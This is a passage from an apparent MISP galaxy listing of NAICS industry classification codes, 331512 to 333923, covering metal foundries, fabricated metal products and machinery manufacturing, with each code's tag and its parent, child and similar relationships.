
331512 has relationships with:

  • child-of: misp-galaxy:naics="3315" with estimative-language:likelihood-probability="likely"

331513

Steel Foundries (except Investment)

The tag is: misp-galaxy:naics="331513"

331513 has relationships with:

  • child-of: misp-galaxy:naics="3315" with estimative-language:likelihood-probability="likely"

33152

Nonferrous Metal Foundries

The tag is: misp-galaxy:naics="33152"

33152 has relationships with:

  • child-of: misp-galaxy:naics="3315" with estimative-language:likelihood-probability="likely"

331523

Nonferrous Metal Die-Casting Foundries

The tag is: misp-galaxy:naics="331523"

331523 has relationships with:

  • child-of: misp-galaxy:naics="3315" with estimative-language:likelihood-probability="likely"

331524

Aluminum Foundries (except Die-Casting)

The tag is: misp-galaxy:naics="331524"

331524 has relationships with:

  • child-of: misp-galaxy:naics="3315" with estimative-language:likelihood-probability="likely"

331529

Other Nonferrous Metal Foundries (except Die-Casting)

The tag is: misp-galaxy:naics="331529"

331529 has relationships with:

  • child-of: misp-galaxy:naics="3315" with estimative-language:likelihood-probability="likely"

332

Fabricated Metal Product Manufacturing

The tag is: misp-galaxy:naics="332"

332 has relationships with:

  • parent-of: misp-galaxy:naics="3321" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="3322" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="3323" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="3324" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="3325" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="3326" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="3327" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="3328" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="3329" with estimative-language:likelihood-probability="likely"

3321

Forging and Stamping

The tag is: misp-galaxy:naics="3321"

3321 has relationships with:

  • child-of: misp-galaxy:naics="332" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="33211" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="332111" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="332112" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="332114" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="332117" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="332119" with estimative-language:likelihood-probability="likely"

33211

Forging and Stamping

The tag is: misp-galaxy:naics="33211"

33211 has relationships with:

  • child-of: misp-galaxy:naics="3321" with estimative-language:likelihood-probability="likely"

332111

Iron and Steel Forging

The tag is: misp-galaxy:naics="332111"

332111 has relationships with:

  • child-of: misp-galaxy:naics="3321" with estimative-language:likelihood-probability="likely"

332112

Nonferrous Forging

The tag is: misp-galaxy:naics="332112"

332112 has relationships with:

  • child-of: misp-galaxy:naics="3321" with estimative-language:likelihood-probability="likely"

332114

Custom Roll Forming

The tag is: misp-galaxy:naics="332114"

332114 has relationships with:

  • child-of: misp-galaxy:naics="3321" with estimative-language:likelihood-probability="likely"

332117

Powder Metallurgy Part Manufacturing

The tag is: misp-galaxy:naics="332117"

332117 has relationships with:

  • child-of: misp-galaxy:naics="3321" with estimative-language:likelihood-probability="likely"

332119

Metal Crown, Closure, and Other Metal Stamping (except Automotive)

The tag is: misp-galaxy:naics="332119"

332119 has relationships with:

  • child-of: misp-galaxy:naics="3321" with estimative-language:likelihood-probability="likely"

3322

Cutlery and Handtool Manufacturing

The tag is: misp-galaxy:naics="3322"

3322 has relationships with:

  • child-of: misp-galaxy:naics="332" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="33221" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="332215" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="332216" with estimative-language:likelihood-probability="likely"

33221

Cutlery and Handtool Manufacturing

The tag is: misp-galaxy:naics="33221"

33221 has relationships with:

  • child-of: misp-galaxy:naics="3322" with estimative-language:likelihood-probability="likely"

332215

Metal Kitchen Cookware, Utensil, Cutlery, and Flatware (except Precious) Manufacturing

The tag is: misp-galaxy:naics="332215"

332215 has relationships with:

  • child-of: misp-galaxy:naics="3322" with estimative-language:likelihood-probability="likely"

332216

Saw Blade and Handtool Manufacturing

The tag is: misp-galaxy:naics="332216"

332216 has relationships with:

  • child-of: misp-galaxy:naics="3322" with estimative-language:likelihood-probability="likely"

3323

Architectural and Structural Metals Manufacturing

The tag is: misp-galaxy:naics="3323"

3323 has relationships with:

  • child-of: misp-galaxy:naics="332" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="33231" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="332311" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="332312" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="332313" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="33232" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="332321" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="332322" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="332323" with estimative-language:likelihood-probability="likely"

33231

Plate Work and Fabricated Structural Product Manufacturing

The tag is: misp-galaxy:naics="33231"

33231 has relationships with:

  • child-of: misp-galaxy:naics="3323" with estimative-language:likelihood-probability="likely"

332311

Prefabricated Metal Building and Component Manufacturing

The tag is: misp-galaxy:naics="332311"

332311 has relationships with:

  • child-of: misp-galaxy:naics="3323" with estimative-language:likelihood-probability="likely"

332312

Fabricated Structural Metal Manufacturing

The tag is: misp-galaxy:naics="332312"

332312 has relationships with:

  • child-of: misp-galaxy:naics="3323" with estimative-language:likelihood-probability="likely"

332313

Plate Work Manufacturing

The tag is: misp-galaxy:naics="332313"

332313 has relationships with:

  • child-of: misp-galaxy:naics="3323" with estimative-language:likelihood-probability="likely"

33232

Ornamental and Architectural Metal Products Manufacturing

The tag is: misp-galaxy:naics="33232"

33232 has relationships with:

  • child-of: misp-galaxy:naics="3323" with estimative-language:likelihood-probability="likely"

332321

Metal Window and Door Manufacturing

The tag is: misp-galaxy:naics="332321"

332321 has relationships with:

  • child-of: misp-galaxy:naics="3323" with estimative-language:likelihood-probability="likely"

332322

Sheet Metal Work Manufacturing

The tag is: misp-galaxy:naics="332322"

332322 has relationships with:

  • child-of: misp-galaxy:naics="3323" with estimative-language:likelihood-probability="likely"

332323

Ornamental and Architectural Metal Work Manufacturing

The tag is: misp-galaxy:naics="332323"

332323 has relationships with:

  • child-of: misp-galaxy:naics="3323" with estimative-language:likelihood-probability="likely"

3324

Boiler, Tank, and Shipping Container Manufacturing

The tag is: misp-galaxy:naics="3324"

3324 has relationships with:

  • child-of: misp-galaxy:naics="332" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="33241" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="332410" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="33242" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="332420" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="33243" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="332431" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="332439" with estimative-language:likelihood-probability="likely"

33241

Power Boiler and Heat Exchanger Manufacturing

The tag is: misp-galaxy:naics="33241"

33241 has relationships with:

  • child-of: misp-galaxy:naics="3324" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="332410" with estimative-language:likelihood-probability="likely"

332410

Power Boiler and Heat Exchanger Manufacturing

The tag is: misp-galaxy:naics="332410"

332410 has relationships with:

  • child-of: misp-galaxy:naics="3324" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="33241" with estimative-language:likelihood-probability="likely"

33242

Metal Tank (Heavy Gauge) Manufacturing

The tag is: misp-galaxy:naics="33242"

33242 has relationships with:

  • child-of: misp-galaxy:naics="3324" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="332420" with estimative-language:likelihood-probability="likely"

332420

Metal Tank (Heavy Gauge) Manufacturing

The tag is: misp-galaxy:naics="332420"

332420 has relationships with:

  • child-of: misp-galaxy:naics="3324" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="33242" with estimative-language:likelihood-probability="likely"

33243

Metal Can, Box, and Other Metal Container (Light Gauge) Manufacturing

The tag is: misp-galaxy:naics="33243"

33243 has relationships with:

  • child-of: misp-galaxy:naics="3324" with estimative-language:likelihood-probability="likely"

332431

Metal Can Manufacturing

The tag is: misp-galaxy:naics="332431"

332431 has relationships with:

  • child-of: misp-galaxy:naics="3324" with estimative-language:likelihood-probability="likely"

332439

Other Metal Container Manufacturing

The tag is: misp-galaxy:naics="332439"

332439 has relationships with:

  • child-of: misp-galaxy:naics="3324" with estimative-language:likelihood-probability="likely"

3325

Hardware Manufacturing

The tag is: misp-galaxy:naics="3325"

3325 has relationships with:

  • child-of: misp-galaxy:naics="332" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="33251" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="332510" with estimative-language:likelihood-probability="likely"

33251

Hardware Manufacturing

The tag is: misp-galaxy:naics="33251"

33251 has relationships with:

  • child-of: misp-galaxy:naics="3325" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="332510" with estimative-language:likelihood-probability="likely"

332510

Hardware Manufacturing

The tag is: misp-galaxy:naics="332510"

332510 has relationships with:

  • child-of: misp-galaxy:naics="3325" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="33251" with estimative-language:likelihood-probability="likely"

3326

Spring and Wire Product Manufacturing

The tag is: misp-galaxy:naics="3326"

3326 has relationships with:

  • child-of: misp-galaxy:naics="332" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="33261" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="332613" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="332618" with estimative-language:likelihood-probability="likely"

33261

Spring and Wire Product Manufacturing

The tag is: misp-galaxy:naics="33261"

33261 has relationships with:

  • child-of: misp-galaxy:naics="3326" with estimative-language:likelihood-probability="likely"

332613

Spring Manufacturing

The tag is: misp-galaxy:naics="332613"

332613 has relationships with:

  • child-of: misp-galaxy:naics="3326" with estimative-language:likelihood-probability="likely"

332618

Other Fabricated Wire Product Manufacturing

The tag is: misp-galaxy:naics="332618"

332618 has relationships with:

  • child-of: misp-galaxy:naics="3326" with estimative-language:likelihood-probability="likely"

3327

Machine Shops; Turned Product; and Screw, Nut, and Bolt Manufacturing

The tag is: misp-galaxy:naics="3327"

3327 has relationships with:

  • child-of: misp-galaxy:naics="332" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="33271" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="332710" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="33272" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="332721" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="332722" with estimative-language:likelihood-probability="likely"

33271

Machine Shops

The tag is: misp-galaxy:naics="33271"

33271 has relationships with:

  • child-of: misp-galaxy:naics="3327" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="332710" with estimative-language:likelihood-probability="likely"

332710

Machine Shops

The tag is: misp-galaxy:naics="332710"

332710 has relationships with:

  • child-of: misp-galaxy:naics="3327" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="33271" with estimative-language:likelihood-probability="likely"

33272

Turned Product and Screw, Nut, and Bolt Manufacturing

The tag is: misp-galaxy:naics="33272"

33272 has relationships with:

  • child-of: misp-galaxy:naics="3327" with estimative-language:likelihood-probability="likely"

332721

Precision Turned Product Manufacturing

The tag is: misp-galaxy:naics="332721"

332721 has relationships with:

  • child-of: misp-galaxy:naics="3327" with estimative-language:likelihood-probability="likely"

332722

Bolt, Nut, Screw, Rivet, and Washer Manufacturing

The tag is: misp-galaxy:naics="332722"

332722 has relationships with:

  • child-of: misp-galaxy:naics="3327" with estimative-language:likelihood-probability="likely"

3328

Coating, Engraving, Heat Treating, and Allied Activities

The tag is: misp-galaxy:naics="3328"

3328 has relationships with:

  • child-of: misp-galaxy:naics="332" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="33281" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="332811" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="332812" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="332813" with estimative-language:likelihood-probability="likely"

33281

Coating, Engraving, Heat Treating, and Allied Activities

The tag is: misp-galaxy:naics="33281"

33281 has relationships with:

  • child-of: misp-galaxy:naics="3328" with estimative-language:likelihood-probability="likely"

332811

Metal Heat Treating

The tag is: misp-galaxy:naics="332811"

332811 has relationships with:

  • child-of: misp-galaxy:naics="3328" with estimative-language:likelihood-probability="likely"

332812

Metal Coating, Engraving (except Jewelry and Silverware), and Allied Services to Manufacturers

The tag is: misp-galaxy:naics="332812"

332812 has relationships with:

  • child-of: misp-galaxy:naics="3328" with estimative-language:likelihood-probability="likely"

332813

Electroplating, Plating, Polishing, Anodizing, and Coloring

The tag is: misp-galaxy:naics="332813"

332813 has relationships with:

  • child-of: misp-galaxy:naics="3328" with estimative-language:likelihood-probability="likely"

3329

Other Fabricated Metal Product Manufacturing

The tag is: misp-galaxy:naics="3329"

3329 has relationships with:

  • child-of: misp-galaxy:naics="332" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="33291" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="332911" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="332912" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="332913" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="332919" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="33299" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="332991" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="332992" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="332993" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="332994" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="332996" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="332999" with estimative-language:likelihood-probability="likely"

33291

Metal Valve Manufacturing

The tag is: misp-galaxy:naics="33291"

33291 has relationships with:

  • child-of: misp-galaxy:naics="3329" with estimative-language:likelihood-probability="likely"

332911

Industrial Valve Manufacturing

The tag is: misp-galaxy:naics="332911"

332911 has relationships with:

  • child-of: misp-galaxy:naics="3329" with estimative-language:likelihood-probability="likely"

332912

Fluid Power Valve and Hose Fitting Manufacturing

The tag is: misp-galaxy:naics="332912"

332912 has relationships with:

  • child-of: misp-galaxy:naics="3329" with estimative-language:likelihood-probability="likely"

332913

Plumbing Fixture Fitting and Trim Manufacturing

The tag is: misp-galaxy:naics="332913"

332913 has relationships with:

  • child-of: misp-galaxy:naics="3329" with estimative-language:likelihood-probability="likely"

332919

Other Metal Valve and Pipe Fitting Manufacturing

The tag is: misp-galaxy:naics="332919"

332919 has relationships with:

  • child-of: misp-galaxy:naics="3329" with estimative-language:likelihood-probability="likely"

33299

All Other Fabricated Metal Product Manufacturing

The tag is: misp-galaxy:naics="33299"

33299 has relationships with:

  • child-of: misp-galaxy:naics="3329" with estimative-language:likelihood-probability="likely"

332991

Ball and Roller Bearing Manufacturing

The tag is: misp-galaxy:naics="332991"

332991 has relationships with:

  • child-of: misp-galaxy:naics="3329" with estimative-language:likelihood-probability="likely"

332992

Small Arms Ammunition Manufacturing

The tag is: misp-galaxy:naics="332992"

332992 has relationships with:

  • child-of: misp-galaxy:naics="3329" with estimative-language:likelihood-probability="likely"

332993

Ammunition (except Small Arms) Manufacturing

The tag is: misp-galaxy:naics="332993"

332993 has relationships with:

  • child-of: misp-galaxy:naics="3329" with estimative-language:likelihood-probability="likely"

332994

Small Arms, Ordnance, and Ordnance Accessories Manufacturing

The tag is: misp-galaxy:naics="332994"

332994 has relationships with:

  • child-of: misp-galaxy:naics="3329" with estimative-language:likelihood-probability="likely"

332996

Fabricated Pipe and Pipe Fitting Manufacturing

The tag is: misp-galaxy:naics="332996"

332996 has relationships with:

  • child-of: misp-galaxy:naics="3329" with estimative-language:likelihood-probability="likely"

332999

All Other Miscellaneous Fabricated Metal Product Manufacturing

The tag is: misp-galaxy:naics="332999"

332999 has relationships with:

  • child-of: misp-galaxy:naics="3329" with estimative-language:likelihood-probability="likely"

333

Machinery Manufacturing

The tag is: misp-galaxy:naics="333"

333 has relationships with:

  • parent-of: misp-galaxy:naics="3331" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="3332" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="3333" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="3334" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="3335" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="3336" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="3339" with estimative-language:likelihood-probability="likely"

3331

Agriculture, Construction, and Mining Machinery Manufacturing

The tag is: misp-galaxy:naics="3331"

3331 has relationships with:

  • child-of: misp-galaxy:naics="333" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="33311" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="333111" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="333112" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="33312" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="333120" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="33313" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="333131" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="333132" with estimative-language:likelihood-probability="likely"

33311

Agricultural Implement Manufacturing

The tag is: misp-galaxy:naics="33311"

33311 has relationships with:

  • child-of: misp-galaxy:naics="3331" with estimative-language:likelihood-probability="likely"

333111

Farm Machinery and Equipment Manufacturing

The tag is: misp-galaxy:naics="333111"

333111 has relationships with:

  • child-of: misp-galaxy:naics="3331" with estimative-language:likelihood-probability="likely"

333112

Lawn and Garden Tractor and Home Lawn and Garden Equipment Manufacturing

The tag is: misp-galaxy:naics="333112"

333112 has relationships with:

  • child-of: misp-galaxy:naics="3331" with estimative-language:likelihood-probability="likely"

33312

Construction Machinery Manufacturing

The tag is: misp-galaxy:naics="33312"

33312 has relationships with:

  • child-of: misp-galaxy:naics="3331" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="333120" with estimative-language:likelihood-probability="likely"

333120

Construction Machinery Manufacturing

The tag is: misp-galaxy:naics="333120"

333120 has relationships with:

  • child-of: misp-galaxy:naics="3331" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="33312" with estimative-language:likelihood-probability="likely"

33313

Mining and Oil and Gas Field Machinery Manufacturing

The tag is: misp-galaxy:naics="33313"

33313 has relationships with:

  • child-of: misp-galaxy:naics="3331" with estimative-language:likelihood-probability="likely"

333131

Mining Machinery and Equipment Manufacturing

The tag is: misp-galaxy:naics="333131"

333131 has relationships with:

  • child-of: misp-galaxy:naics="3331" with estimative-language:likelihood-probability="likely"

333132

Oil and Gas Field Machinery and Equipment Manufacturing

The tag is: misp-galaxy:naics="333132"

333132 has relationships with:

  • child-of: misp-galaxy:naics="3331" with estimative-language:likelihood-probability="likely"

3332

Industrial Machinery Manufacturing

The tag is: misp-galaxy:naics="3332"

3332 has relationships with:

  • child-of: misp-galaxy:naics="333" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="33324" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="333241" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="333242" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="333243" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="333248" with estimative-language:likelihood-probability="likely"

33324

Industrial Machinery Manufacturing

The tag is: misp-galaxy:naics="33324"

33324 has relationships with:

  • child-of: misp-galaxy:naics="3332" with estimative-language:likelihood-probability="likely"

333241

Food Product Machinery Manufacturing

The tag is: misp-galaxy:naics="333241"

333241 has relationships with:

  • child-of: misp-galaxy:naics="3332" with estimative-language:likelihood-probability="likely"

333242

Semiconductor Machinery Manufacturing

The tag is: misp-galaxy:naics="333242"

333242 has relationships with:

  • child-of: misp-galaxy:naics="3332" with estimative-language:likelihood-probability="likely"

333243

Sawmill, Woodworking, and Paper Machinery Manufacturing

The tag is: misp-galaxy:naics="333243"

333243 has relationships with:

  • child-of: misp-galaxy:naics="3332" with estimative-language:likelihood-probability="likely"

333248

All Other Industrial Machinery Manufacturing

The tag is: misp-galaxy:naics="333248"

333248 has relationships with:

  • child-of: misp-galaxy:naics="3332" with estimative-language:likelihood-probability="likely"

3333

Commercial and Service Industry Machinery Manufacturing

The tag is: misp-galaxy:naics="3333"

3333 has relationships with:

  • child-of: misp-galaxy:naics="333" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="33331" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="333310" with estimative-language:likelihood-probability="likely"

33331

Commercial and Service Industry Machinery Manufacturing

The tag is: misp-galaxy:naics="33331"

33331 has relationships with:

  • child-of: misp-galaxy:naics="3333" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="333310" with estimative-language:likelihood-probability="likely"

333310

Commercial and Service Industry Machinery Manufacturing

The tag is: misp-galaxy:naics="333310"

333310 has relationships with:

  • child-of: misp-galaxy:naics="3333" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="33331" with estimative-language:likelihood-probability="likely"

3334

Ventilation, Heating, Air-Conditioning, and Commercial Refrigeration Equipment Manufacturing

The tag is: misp-galaxy:naics="3334"

3334 has relationships with:

  • child-of: misp-galaxy:naics="333" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="33341" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="333413" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="333414" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="333415" with estimative-language:likelihood-probability="likely"

33341

Ventilation, Heating, Air-Conditioning, and Commercial Refrigeration Equipment Manufacturing

The tag is: misp-galaxy:naics="33341"

33341 has relationships with:

  • child-of: misp-galaxy:naics="3334" with estimative-language:likelihood-probability="likely"

333413

Industrial and Commercial Fan and Blower and Air Purification Equipment Manufacturing

The tag is: misp-galaxy:naics="333413"

333413 has relationships with:

  • child-of: misp-galaxy:naics="3334" with estimative-language:likelihood-probability="likely"

333414

Heating Equipment (except Warm Air Furnaces) Manufacturing

The tag is: misp-galaxy:naics="333414"

333414 has relationships with:

  • child-of: misp-galaxy:naics="3334" with estimative-language:likelihood-probability="likely"

333415

Air-Conditioning and Warm Air Heating Equipment and Commercial and Industrial Refrigeration Equipment Manufacturing

The tag is: misp-galaxy:naics="333415"

333415 has relationships with:

  • child-of: misp-galaxy:naics="3334" with estimative-language:likelihood-probability="likely"

3335

Metalworking Machinery Manufacturing

The tag is: misp-galaxy:naics="3335"

3335 has relationships with:

  • child-of: misp-galaxy:naics="333" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="33351" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="333511" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="333514" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="333515" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="333517" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="333519" with estimative-language:likelihood-probability="likely"

33351

Metalworking Machinery Manufacturing

The tag is: misp-galaxy:naics="33351"

33351 has relationships with:

  • child-of: misp-galaxy:naics="3335" with estimative-language:likelihood-probability="likely"

333511

Industrial Mold Manufacturing

The tag is: misp-galaxy:naics="333511"

333511 has relationships with:

  • child-of: misp-galaxy:naics="3335" with estimative-language:likelihood-probability="likely"

333514

Special Die and Tool, Die Set, Jig, and Fixture Manufacturing

The tag is: misp-galaxy:naics="333514"

333514 has relationships with:

  • child-of: misp-galaxy:naics="3335" with estimative-language:likelihood-probability="likely"

333515

Cutting Tool and Machine Tool Accessory Manufacturing

The tag is: misp-galaxy:naics="333515"

333515 has relationships with:

  • child-of: misp-galaxy:naics="3335" with estimative-language:likelihood-probability="likely"

333517

Machine Tool Manufacturing

The tag is: misp-galaxy:naics="333517"

333517 has relationships with:

  • child-of: misp-galaxy:naics="3335" with estimative-language:likelihood-probability="likely"

333519

Rolling Mill and Other Metalworking Machinery Manufacturing

The tag is: misp-galaxy:naics="333519"

333519 has relationships with:

  • child-of: misp-galaxy:naics="3335" with estimative-language:likelihood-probability="likely"

3336

Engine, Turbine, and Power Transmission Equipment Manufacturing

The tag is: misp-galaxy:naics="3336"

3336 has relationships with:

  • child-of: misp-galaxy:naics="333" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="33361" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="333611" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="333612" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="333613" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="333618" with estimative-language:likelihood-probability="likely"

33361

Engine, Turbine, and Power Transmission Equipment Manufacturing

The tag is: misp-galaxy:naics="33361"

33361 has relationships with:

  • child-of: misp-galaxy:naics="3336" with estimative-language:likelihood-probability="likely"

333611

Turbine and Turbine Generator Set Units Manufacturing

The tag is: misp-galaxy:naics="333611"

333611 has relationships with:

  • child-of: misp-galaxy:naics="3336" with estimative-language:likelihood-probability="likely"

333612

Speed Changer, Industrial High-Speed Drive, and Gear Manufacturing

The tag is: misp-galaxy:naics="333612"

333612 has relationships with:

  • child-of: misp-galaxy:naics="3336" with estimative-language:likelihood-probability="likely"

333613

Mechanical Power Transmission Equipment Manufacturing

The tag is: misp-galaxy:naics="333613"

333613 has relationships with:

  • child-of: misp-galaxy:naics="3336" with estimative-language:likelihood-probability="likely"

333618

Other Engine Equipment Manufacturing

The tag is: misp-galaxy:naics="333618"

333618 has relationships with:

  • child-of: misp-galaxy:naics="3336" with estimative-language:likelihood-probability="likely"

3339

Other General Purpose Machinery Manufacturing

The tag is: misp-galaxy:naics="3339"

3339 has relationships with:

  • child-of: misp-galaxy:naics="333" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="33391" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="333912" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="333914" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="33392" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="333921" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="333922" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="333923" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="333924" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="33399" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="333991" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="333992" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="333993" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="333994" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="333995" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="333996" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="333998" with estimative-language:likelihood-probability="likely"

33391

Pump and Compressor Manufacturing

The tag is: misp-galaxy:naics="33391"

33391 has relationships with:

  • child-of: misp-galaxy:naics="3339" with estimative-language:likelihood-probability="likely"

333912

Air and Gas Compressor Manufacturing

The tag is: misp-galaxy:naics="333912"

333912 has relationships with:

  • child-of: misp-galaxy:naics="3339" with estimative-language:likelihood-probability="likely"

333914

Measuring, Dispensing, and Other Pumping Equipment Manufacturing

The tag is: misp-galaxy:naics="333914"

333914 has relationships with:

  • child-of: misp-galaxy:naics="3339" with estimative-language:likelihood-probability="likely"

33392

Material Handling Equipment Manufacturing

The tag is: misp-galaxy:naics="33392"

33392 has relationships with:

  • child-of: misp-galaxy:naics="3339" with estimative-language:likelihood-probability="likely"

333921

Elevator and Moving Stairway Manufacturing

The tag is: misp-galaxy:naics="333921"

333921 has relationships with:

  • child-of: misp-galaxy:naics="3339" with estimative-language:likelihood-probability="likely"

333922

Conveyor and Conveying Equipment Manufacturing

The tag is: misp-galaxy:naics="333922"

333922 has relationships with:

  • child-of: misp-galaxy:naics="3339" with estimative-language:likelihood-probability="likely"

333923

Overhead Traveling Crane, Hoist, and Monorail System Manufacturing

